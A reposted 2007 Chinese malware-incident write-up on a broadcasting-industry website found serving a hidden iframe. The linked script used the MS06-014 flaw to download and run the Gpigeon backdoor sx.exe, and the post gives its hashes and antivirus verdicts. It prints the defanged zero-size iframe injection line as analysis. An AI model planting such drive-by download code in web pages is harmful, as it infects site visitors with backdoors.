某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
来源:互联网 发布:什么打车软件赚钱 编辑:程序博客网 时间:2024/05/14 05:02
某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
endurer 原创
2007-09-06 第1版
网站页面被植入代码:
/---
<iframe src=hxxp://www.h**l*bz.com/x*j***/Dns.htm width=0 height=0>
---/
hxxp://www.h**l*bz.com/x*j***/Dns.htm 包含 JavaScript脚本,首先输出escape编码的信息:
/---
www.CuteQq.cn
ZJWm 6 Beta 3
---/
接着利用 MS06014 漏洞,下载 sx.exe,保存为 %system32%/Cuteqq_Cn.exe,再用 shell.execute来运行。
文件说明符 : d:/test/sx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-9-5 12:46:20
修改时间 : 2007-9-5 12:46:56
访问时间 : 2007-9-5 0:0:0
大小 : 284672 字节 278.0 KB
MD5 : 2262830c8f7f932cf08ed1a296b2acaa
HSA1: 6F8B603FB869F52960184E843A724677115C0A97
使用的是WMP媒体文件的图标
Kasepersky 报为 Packed.Win32.Klone.af
主 题: 病毒上报邮件分析结果-流水单号:20070905125954073811 发件人: "" <send@rising.net.cn> 发送时间2007.09.05 14:16 尊敬的客户,您好!
您的邮件已经收到,感谢您对瑞星的支持。
我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
1.文件名:sx.exe
病毒名:Backdoor.Win32.Gpigeon.aic
您所上报的病毒文件将在19.39.30版本中处理解决。
- 某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
- 某雅思培训网站被挂 server.exe / Dropper.Win32.BlackHole.a / Backdoor.Win32.Hupigon.jmq
- 遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等1
- 遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等2
- 遭遇Backdoor.Gpigeon.2007.ca,Trojan-PSW.Win32.QQRob.lg,Backdoor.Win32.Agent.bcn等3
- 顽固的灰鸽子 Backdoor.Gpigeon.uql 变种 Backdoor.Win32.Hupigon.cda
- 斩杀灰鸽子Backdoor.Gpigeon.gqs/Backdoor.Win32.Hupigon.cce等
- 遭遇 Backdoor.Win32.Agent.amb / serivces.exe
- Backdoor.Win32.IRCbot.vim(mdesvc.exe)
- 免费刷会员和六钻工具?小心通过QQ传播的灰鸽子Backdoor.Win32.Gpigeon.gem
- 关于病毒Backdoor.Gpigeon.uql
- [07-28] 一个下载灰鸽子Backdoor.Gpigeon.2006等病毒的网站(第2版)
- 某市职业经理人高级研修学院网站被植入传播Backdoor.Gpigeon.GEN的代码
- 某论坛被加入下载灰鸽子Backdoor.Gpigeon.2006.bbe等恶意程序的代码
- 遭遇灰鸽子BackDoor.Gpigeon.ymg新变种
- 类似灰鸽子的木马的清除 Backdoor.Gpigeon.bhv Backdoor.Gpigeon.cdd
- 数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
- 一个下载灰鸽子Backdoor.Win32.Hupigon.cge的网站
- install cppUnit for eclipse
- 基于SSL的JavaMail
- 一个开源的IoC采集服务器体系结构设计
- OOPS中文开放式课程计划=足不出户的“出国留学”
- (JSP)在文本域中显示超链接——服务器部分代码
- 某广电行业网站被挂马 Backdoor.Win32.Gpigeon.aic/ sx.exe
- 关于RSS (转自 百度知道)
- 我的第一贴: 小试牛刀, Oracle的Transaction
- 水晶报表
- [转]我的Ubuntu7.04设置小集
- 强化培训9.6——核心网
- RedHat Linux 9系统管理基础
- 我来用javac编译,jar命令打包
- PHP 修炼【二】